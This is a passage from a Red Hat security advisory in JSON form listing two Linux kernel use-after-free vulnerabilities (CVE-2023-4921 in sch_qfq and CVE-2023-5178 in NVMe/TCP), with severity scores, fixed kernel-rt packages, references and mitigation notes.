"discovery_date": "2023-10-22T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2245514"
}
],
"notes": [
{
"category": "description",
"text": "A use-after-free flaw was found in qfq_dequeue and agg_dequeue in net/sched/sch_qfq.c in the Traffic Control (QoS) subsystem in the Linux kernel. This issue may allow a local user to crash the system or escalate their privileges on the system.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "kernel: use-after-free in sch_qfq network scheduler",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"NFV-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.src",
"NFV-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debuginfo-common-x86_64-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.src",
"RT-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debuginfo-common-x86_64-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2023-4921"
},
{
"category": "external",
"summary": "RHBZ#2245514",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2245514"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2023-4921",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-4921"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2023-4921",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-4921"
},
{
"category": "external",
"summary": "https://github.com/torvalds/linux/commit/8fc134fee27f2263988ae38920bc03da416b03d8",
"url": "https://github.com/torvalds/linux/commit/8fc134fee27f2263988ae38920bc03da416b03d8"
}
],
"release_date": "2023-09-05T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-03-12T11:49:04+00:00",
"details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nThe system must be rebooted for this update to take effect.",
"product_ids": [
"NFV-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.src",
"NFV-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debuginfo-common-x86_64-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.src",
"RT-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debuginfo-common-x86_64-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:1269"
},
{
"category": "workaround",
"details": "Mitigation for this issue is to skip loading the affected module sch_qfq onto the system until we have a fix available. This can be done by a blacklist mechanism and will ensure the driver is not loaded at the boot time.\n~~~\n How do I blacklist a kernel module to prevent it from loading automatically? \nhttps://access.redhat.com/solutions/41278 \n~~~",
"product_ids": [
"NFV-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.src",
"NFV-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debuginfo-common-x86_64-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.src",
"RT-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debuginfo-common-x86_64-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"NFV-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.src",
"NFV-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debuginfo-common-x86_64-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.src",
"RT-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debuginfo-common-x86_64-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "kernel: use-after-free in sch_qfq network scheduler"
},
{
"cve": "CVE-2023-5178",
"cwe": {
"id": "CWE-416",
"name": "Use After Free"
},
"discovery_date": "2023-10-03T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2241924"
}
],
"notes": [
{
"category": "description",
"text": "A use-after-free vulnerability was found in drivers/nvme/target/tcp.c` in `nvmet_tcp_free_crypto` due to a logical bug in the NVMe/TCP subsystem in the Linux kernel. This issue may allow a malicious user to cause a use-after-free and double-free problem, which may permit remote code execution or lead to local privilege escalation.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "kernel: use after free in nvmet_tcp_free_crypto in NVMe",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This vulnerability is actual only for systems where NVME over TCP being used.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"NFV-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.src",
"NFV-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debuginfo-common-x86_64-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.src",
"RT-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debuginfo-common-x86_64-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2023-5178"
},
{
"category": "external",
"summary": "RHBZ#2241924",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2241924"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2023-5178",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-5178"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2023-5178",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-5178"
},
{
"category": "external",
"summary": "https://lore.kernel.org/linux-nvme/20231002105428.226515-1-sagi@grimberg.me/",
"url": "https://lore.kernel.org/linux-nvme/20231002105428.226515-1-sagi@grimberg.me/"
}
],
"release_date": "2023-10-15T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-03-12T11:49:04+00:00",
"details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nThe system must be rebooted for this update to take effect.",
"product_ids": [
"NFV-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.src",
"NFV-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debuginfo-common-x86_64-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.src",
"RT-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debug-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-debuginfo-common-x86_64-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"RT-8.2.0.Z.TUS:kernel-rt-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:1269"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options don\u0027t meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"NFV-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.src",
"NFV-8.2.0.Z.TUS:kernel-rt-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-core-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-kvm-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-modules-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debug-modules-extra-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debuginfo-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-debuginfo-common-x86_64-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
"NFV-8.2.0.Z.TUS:kernel-rt-devel-0:4.18.0-193.128.1.rt13.179.el8_2.x86_64",
